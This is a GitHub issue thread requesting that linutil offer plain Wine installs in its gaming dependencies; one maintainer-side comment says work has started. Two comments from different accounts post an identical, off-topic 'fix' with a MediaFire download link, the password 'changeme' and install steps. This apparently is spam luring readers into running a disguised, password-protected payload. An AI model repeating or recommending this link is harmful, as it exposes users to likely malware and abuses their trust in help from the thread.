### ISSUE TITLE
Add option to Install plain Wine

### ISSUE THREAD

**Issue by bungadrum** [ChrisTitusTech/linutil#207]
**Is your feature request related to a problem? Please describe.**
I have a few old games that I just run with regular Wine would it be possible to add them in Gaming dependencies as an option?

**Describe the solution you'd like**
In Linutil the Gaming dependencies section there could be 3 option for installing regular wine Stable, Development or Staging branch. You could also add them in search it would give you 3 results and you pick which one you want to install.

**Describe alternatives you've considered**
Just regular Wine without any extra stuff or content if someone wants Steam, Lutris or anything extra those could be seperated into categories

**Additional context**
https://wiki.winehq.org/Download

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by prschorn** [comment]
Working on it
